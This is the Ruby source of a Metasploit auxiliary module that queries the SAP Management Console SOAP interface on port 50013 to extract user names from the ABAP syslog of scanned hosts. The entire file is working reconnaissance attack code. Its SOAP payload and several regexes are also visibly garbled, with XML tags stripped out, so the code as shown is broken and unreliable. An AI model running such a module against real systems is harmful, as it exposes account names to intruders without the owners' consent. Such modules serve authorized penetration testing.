##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SAP Management Console Extract Users',
'Version' => '$Revision$',
'Description' => %q{
This module simply attempts to extract SAP users from the ABAP
Syslog through the SAP Management Console SOAP Interface.
},
'References' =>
[
# General
[ 'URL', 'http://blog.c22.cc' ]
],
'Author' => [ 'Chris John Riley' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(50013),
OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
], self.class)
register_autofilter_ports([ 50013 ])
deregister_options('RHOST')
end
def rport
datastore['RPORT']
end
def run_host(ip)
res = send_request_cgi({
'uri' => "/#{datastore['URI']}",
'method' => 'GET',
'headers' =>
{
'User-Agent' => datastore['UserAgent']
}
}, 25)
if not res
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
return
end
extractusers(ip)
end
def extractusers(rhost)
verbose = datastore['VERBOSE']
print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
success = false
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xsi = 'http://www.w3.org/2001/XMLSchema-instance'
xs = 'http://www.w3.org/2001/XMLSchema'
sapsess = 'http://www.sap.com/webas/630/soap/features/session/'
ns1 = 'ns1:ABAPReadSyslog'
data = '' + "\r\n"
data << '' + "\r\n"
data << '' + "\r\n"
data << '' + "\r\n"
data << 'true' + "\r\n"
data << '' + "\r\n"
data << '' + "\r\n"
data << '' + "\r\n"
data << '<' + ns1 + ' xmlns:ns1="urn:SAPControl">' + ns1 + '>' + "\r\n"
data << '' + "\r\n"
data << '' + "\r\n\r\n"
begin
res = send_request_raw({
'uri' => "/#{datastore['URI']}",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Length' => data.length,
'SOAPAction' => '""',
'Content-Type' => 'text/xml; charset=UTF-8',
}
}, 60)
env = []
if res.code == 200
case res.body
when nil
# Nothing
when/([^<]+)<\/User>/i
body = []
body = res.body unless res.body.nil?
users = body.scan(/([^<]+)<\/User>/i)
users = users.uniq
success = true
end
elsif res.code == 500
case res.body
when /(.*)<\/faultstring>/i
faultcode = "#{$1}"
fault = true
end
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication on #{rhost}:#{rport}")
return
end
if success
print_good("#{rhost}:#{rport} [SAP] Users Extracted: #{users.length} entries extracted from #{rhost}:#{rport}")
report_note(
:host => rhost,
:proto => 'tcp',
:port => rport,
:type => 'sap.users',
:data => {:proto => "soap", :users => users},
:update => :unique_data
)
users.each do |output|
print_good("#{rhost}:#{rport} [SAP] Extracted User: #{output[0]}")
end
return
elsif fault
print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
return
else
print_error("#{rhost}#{rport} [SAP] failed to access ABAPSyslog on #{rhost}:#{rport}")
return
end
end
end